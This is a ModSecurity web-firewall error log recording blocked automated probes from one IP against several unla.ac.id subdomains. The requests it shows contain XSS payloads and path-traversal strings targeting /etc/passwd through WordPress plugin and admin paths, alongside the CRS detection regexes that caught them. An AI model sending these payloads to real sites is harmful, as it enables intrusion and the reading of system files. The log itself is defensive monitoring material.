[Tue Aug 29 11:55:19.810666 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf found within ARGS:wp-submit: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16N8Co-f0AAAqqtdEAAAAA"]
[Tue Aug 29 11:55:20.539288 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:playlist. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:playlist: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/hdw-tube/playlist.php"] [unique_id "ZO16OMCo-f0AAAqSwsUAAAAN"]
[Tue Aug 29 11:55:20.547973 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf found within ARGS:wp-submit: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16OMCo-f0AAAqqtdQAAAAA"]
[Tue Aug 29 11:55:20.573159 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:msg: &#<svg/onload=alert(1337)>;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/message"] [unique_id "ZO16OMCo-f0AAApbUfEAAAAh"]
[Tue Aug 29 11:55:20.615261 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:playlist. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:playlist: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/hdw-tube/playlist.php"] [unique_id "ZO16OMCo-f0AAApbUfMAAAAh"]
[Tue Aug 29 11:55:20.688185 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:playlist. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:playlist: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/hdw-tube/playlist.php"] [unique_id "ZO16OMCo-f0AAApbUfYAAAAh"]
[Tue Aug 29 11:55:20.691118 2023] [:error] [pid 2736] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:playlist. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:playlist: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/hdw-tube/playlist.php"] [unique_id "ZO16OMCo-f0AAAqw518AAAAH"]
[Tue Aug 29 11:55:20.712472 2023] [:error] [pid 2736] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:playlist. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:playlist: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/hdw-tube/playlist.php"] [unique_id "ZO16OMCo-f0AAAqw52AAAAAH"]
[Tue Aug 29 11:55:21.608957 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:playlist. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:playlist: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/hdw-tube/playlist.php"] [unique_id "ZO16OcCo-f0AAApHRgAAAAAP"]
[Tue Aug 29 11:55:21.656448 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errmsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:errmsg: ABABAB--><script>alert(1337)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/remote/error"] [unique_id "ZO16OcCo-f0AAAqqtdoAAAAA"]
[Tue Aug 29 11:55:22.537313 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:q: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/templates/m/inc_head.php"] [unique_id "ZO16OsCo-f0AAAolKmsAAAAe"]
[Tue Aug 29 11:55:22.564379 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:q: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/templates/m/inc_head.php"] [unique_id "ZO16OsCo-f0AAApHRgUAAAAP"]
[Tue Aug 29 11:55:22.565173 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:q: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/templates/m/inc_head.php"] [unique_id "ZO16OsCo-f0AAApbUfoAAAAh"]
[Tue Aug 29 11:55:22.569634 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO16OsCo-f0AAAqqtd0AAAAA"]
[Tue Aug 29 11:55:22.573727 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:q: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/templates/m/inc_head.php"] [unique_id "ZO16OsCo-f0AAApXgocAAAAU"]
[Tue Aug 29 11:55:22.673464 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO16OsCo-f0AAAqqteAAAAAA"]
[Tue Aug 29 11:55:22.675202 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO16OsCo-f0AAApa-N4AAAAg"]
[Tue Aug 29 11:55:22.675645 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:q: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/templates/m/inc_head.php"] [unique_id "ZO16OsCo-f0AAApHRgkAAAAP"]
[Tue Aug 29 11:55:22.718256 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO16OsCo-f0AAAqqteIAAAAA"]
[Tue Aug 29 11:55:22.726736 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO16OsCo-f0AAApa-OAAAAAg"]
[Tue Aug 29 11:55:23.557598 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:log: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO16O8Co-f0AAAqeFVEAAAAx"]
[Tue Aug 29 11:55:23.743050 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:log: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO16O8Co-f0AAApXgooAAAAU"]
[Tue Aug 29 11:55:23.825672 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:url: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/wp-custom-pages/wp-download.php"] [unique_id "ZO16O8Co-f0AAAqqtecAAAAA"]
[Tue Aug 29 11:55:23.848925 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:url: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/wp-custom-pages/wp-download.php"] [unique_id "ZO16O8Co-f0AAAqeFVIAAAAx"]
[Tue Aug 29 11:55:23.876536 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:url: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/wp-custom-pages/wp-download.php"] [unique_id "ZO16O8Co-f0AAApbUgMAAAAh"]
[Tue Aug 29 11:55:23.903423 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:log: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO16O8Co-f0AAApbUgQAAAAh"]
[Tue Aug 29 11:55:23.937276 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:log: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO16O8Co-f0AAApa-OUAAAAg"]
[Tue Aug 29 11:55:23.941166 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/atmail/"] [unique_id "ZO16O8Co-f0AAAqqtekAAAAA"]
[Tue Aug 29 11:55:23.959557 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:url: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/wp-custom-pages/wp-download.php"] [unique_id "ZO16O8Co-f0AAAoz8E0AAAAS"]
[Tue Aug 29 11:55:23.965501 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:log: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO16O8Co-f0AAAqeFVUAAAAx"]
[Tue Aug 29 11:55:23.995095 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/atmail/"] [unique_id "ZO16O8Co-f0AAAqSwssAAAAN"]
